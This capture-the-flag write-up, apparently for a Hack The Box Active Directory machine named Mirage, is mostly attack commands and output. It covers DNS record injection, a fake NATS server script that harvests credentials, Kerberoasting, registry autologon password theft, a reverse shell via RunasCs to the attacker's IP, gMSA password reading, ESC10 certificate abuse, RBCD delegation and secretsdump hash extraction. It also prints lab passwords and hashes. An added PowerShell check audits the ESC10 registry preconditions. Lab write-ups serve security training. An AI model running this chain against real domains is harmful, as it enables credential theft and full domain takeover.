Basic Information

Port Scan

No web ports; only the usual Windows domain ports plus NFS on 2049:

$ nmap -sC -sV -Pn 10.10.11.78
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-26 11:23 JST
Nmap scan report for 10.10.11.78
Host is up (0.19s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-26 09:00:54Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
|_ 100003 2,3,4 2049/tcp6 nfs
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs 2-4 (RPC #100003)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-26T09:01:49
|_ start_date: N/A
|_clock-skew: 6h36m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 222.48 seconds

nfs

NFS allows unauthenticated access; an export named MirageReports is visible:

$ showmount -e 10.10.11.78
Exports list on 10.10.11.78:
/MirageReports Everyone

Mount it and look at the contents: there are two PDFs, copied locally to read:

sudo mount -t nfs 10.10.11.78:/MirageReports ./mirage

Incident_Report_Missing_DNS_Record_nats-svc.pdf

A report about the missing DNS record for nats-svc:

Mirage_Authentication_Hardening_Report.pdf

A report about phasing out NTLM authentication and using Kerberos only:

nats-svc

DNS records can be added here without authentication. Based on the information in the PDF, add a nats-svc record pointing at our host, start a fake NATS server locally, and capture the credentials the client sends:

└─$ sudo nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 3600 A 10.10.14.6
> send

Dev_Account_A hx5h7F5554fP@1337!

nats

Then connect to the real NATS server with the obtained credentials; another user's credentials appear in the broadcast messages:

nats -s nats://10.10.11.78:4222 rtt --user Dev_Account_A --password 'hx5h7F5554fP@1337!'

nats -s nats://10.10.11.78:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!' stream info

> auth_logs
Subjects: logs.auth

nats -s nats://10.10.11.78:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!' sub logs.auth --all

david.jjackson pN8kQmn6b86!1234@

fake_server.py

import socket

# Minimal listener that speaks just enough of the NATS protocol to make a client
# send its CONNECT line (which carries the credentials) and then drops the connection.
print("[+] Fake NATS Server listening on 0.0.0.0:4222")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)

while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")

    # Send a fake INFO line (required for the NATS handshake); auth_required makes
    # the client include user/pass in its CONNECT reply.
    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')

    # The client's CONNECT line arrives here.
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode(errors="replace"))

    # Optional: respond with -ERR or just close the connection.
    client.close()

david.jjackson to nathan.aadam

With a valid username and password, start with the usual BloodHound collection and the like:

nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k

bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -d mirage.htb -k -ns 10.10.11.78 -c All --zip

nxc smb dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --rid-brute | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

No directly usable path yet, but nathan.aadam is Kerberoastable:

nathan.aadam

Request the hash and crack nathan.aadam's password:

nxc ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoasting hash.txt

sudo hashcat -m 13100 hash.txt ~/Tools/dict/rockyou.txt

3edc#EDC3

users.txt

Administrator
Guest
krbtgt
DC01$
Dev_Account_A
Dev_Account_B
david.jjackson
javier.mmarshall
mark.bbond
nathan.aadam
Mirage-Service$
svc_mirage

user flag

Log in as nathan.aadam with Kerberos authentication:

nxc smb dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k --generate-krb5-file krb5.conf

impacket-getTGT 'mirage.htb/nathan.aadam:3edc#EDC3' -dc-ip 10.10.11.78

export KRB5CCNAME=nathan.aadam.ccache

evil-winrm -i dc01.mirage.htb -r mirage.htb

nats-server.conf

Routine file browsing turns up several user passwords in nats-server.conf:

*Evil-WinRM* PS C:\Program Files\Nats-Server> cat nats-server.conf

sysadmin bb5M0k5XWIGD
Dev_Account_A hx5h7F5554fP@1337!
Dev_Account_B tvPFGAzdsJfHzbRJ

mark.bbond

mark.bbond's password can be obtained from Autologon, either via the usual winPEAS-style tooling or directly from the registry:

reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

mark.bbond
1day@atime

mark.bbond to JAVIER.MMARSHALL

mark.bbond is a member of the IT Support group, which has ForceChangePassword over JAVIER.MMARSHALL:

So change JAVIER.MMARSHALL's password directly:

bloodyAD --host "dc01.mirage.htb" -d "mirage.htb" --dc-ip 10.10.11.78 -u "mark.bbond" -p "1day@atime" -k set password "JAVIER.MMARSHALL" "P@ssw0rd"

JAVIER.MMARSHALL to MIRAGE-SERVICE$

JAVIER.MMARSHALL has ReadGMSAPassword over MIRAGE-SERVICE$:

But JAVIER.MMARSHALL is currently disabled and must be enabled first:

# Switch to mark.bbond (IT Support)
.\RunasCs.exe mark.bbond "1day@atime" powershell -r 10.10.14.6:4444

# Enable the account
Enable-ADAccount -Identity "javier.mmarshall"
# Clear logonHours so the account is allowed to log on at any time
Set-ADUser -Identity "javier.mmarshall" -Clear logonHours

gmsa

Then read the gMSA password:

nxc ldap dc01.mirage.htb -u JAVIER.MMARSHALL  -p "P@ssw0rd" -k --gmsa

305806d84f7c1be93a07aaf40f0c7866

ESC10

The last part is ESC10; its preconditions can only be discovered by manually checking the registry:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\"
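As an added defender-side check (not part of the original writeup), the following PowerShell reads the two registry values that decide whether certificate-to-account mapping is still weak on a DC; the key paths and value names are the ones documented by Microsoft in KB5014754, and Get-RegValueOrNull is a helper written for this example.

```powershell
# Added example: report the registry settings that are ESC10 preconditions.
# Run on the domain controller with local admin rights.
$kdcKey      = 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc'
$schannelKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # value absent: Windows then uses its built-in default
}

# Kerberos PKINIT mapping (KB5014754):
#   0 = disabled (weak; certificates without a strong SID binding are accepted)
#   1 = compatibility, 2 = full enforcement
$sce = Get-RegValueOrNull -Path $kdcKey -Name 'StrongCertificateBindingEnforcement'

# Schannel mapping bit mask: 0x1 subject/issuer, 0x2 issuer, 0x4 UPN,
# 0x8 S4U2Self, 0x10 S4U2Self explicit. Patched default is 0x18; the UPN bit
# (0x4) lets a certificate whose UPN was rewritten log on as another account over LDAPS.
$cmm = Get-RegValueOrNull -Path $schannelKey -Name 'CertificateMappingMethods'

$findings = @()
if ($sce -eq 0) {
    $findings += 'StrongCertificateBindingEnforcement=0: KDC accepts certificates with no strong SID binding'
}
if ($null -ne $cmm -and ($cmm -band 0x4)) {
    $findings += ('CertificateMappingMethods=0x{0:X}: UPN mapping enabled for Schannel (LDAPS) logons' -f $cmm)
}

if ($findings.Count -eq 0) {
    Write-Output "No ESC10 precondition found (StrongCertificateBindingEnforcement=$sce, CertificateMappingMethods=$cmm)"
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

Remediation is to set StrongCertificateBindingEnforcement to 2 and remove the 0x4 bit from CertificateMappingMethods (the post-KB5014754 default of 0x18), then re-run the check.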

Following the wiki step by step:

# Change the UPN of mark.bbond to dc01$
impacket-getTGT 'mirage.htb/MIRAGE-SERVICE$' -hashes :305806d84f7c1be93a07aaf40f0c7866 -dc-ip 10.10.11.78
export KRB5CCNAME=MIRAGE-SERVICE$.ccache
certipy account update -user 'mark.bbond' -upn 'dc01$@mirage.htb' -u 'mirage-service$@mirage.htb' -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb

# Request a certificate as mark.bbond
impacket-getTGT 'mirage.htb/mark.bbond:1day@atime' -dc-ip 10.10.11.78
export KRB5CCNAME=mark.bbond.ccache
certipy req -u mark.bbond@mirage.htb -no-pass -k -ca mirage-DC01-CA -template User -dc-ip 10.10.11.78 -dc-host dc01.mirage.htb

# Restore the original UPN
export KRB5CCNAME=MIRAGE-SERVICE$.ccache
certipy-ad account -u 'mirage-service$' -k -no-pass -target 'dc01.mirage.htb' -upn 'mark.bbond@mirage.htb' -user 'mark.bbond' update

# Authenticate with the certificate
certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell

# ldap-shell
set_rbcd dc01$ Mirage-Service$

# S4U2Proxy
export KRB5CCNAME=MIRAGE-SERVICE$.ccache
impacket-getST -spn 'cifs/dc01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.10.11.78 'mirage.htb/Mirage-Service$' -k -no-pass

# secretsdump
export KRB5CCNAME='dc01$@cifs_dc01.mirage.htb@MIRAGE.HTB.ccache'
impacket-secretsdump 'dc01$'@dc01.mirage.htb -k -no-pass -dc-ip 10.10.11.78 -just-dc-user Administrator

7be6d4f3c2b9c0e3560f5a29eeb1afb3

root flag

Log in as Administrator via Kerberos with the obtained hash:

impacket-getTGT -dc-ip 10.10.11.78 "mirage.htb/Administrator" -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.mirage.htb -r mirage.htb

hashdump

impacket-secretsdump Administrator@dc01.mirage.htb -k -no-pass -dc-ip 10.10.11.78 -just-dc-ntlm

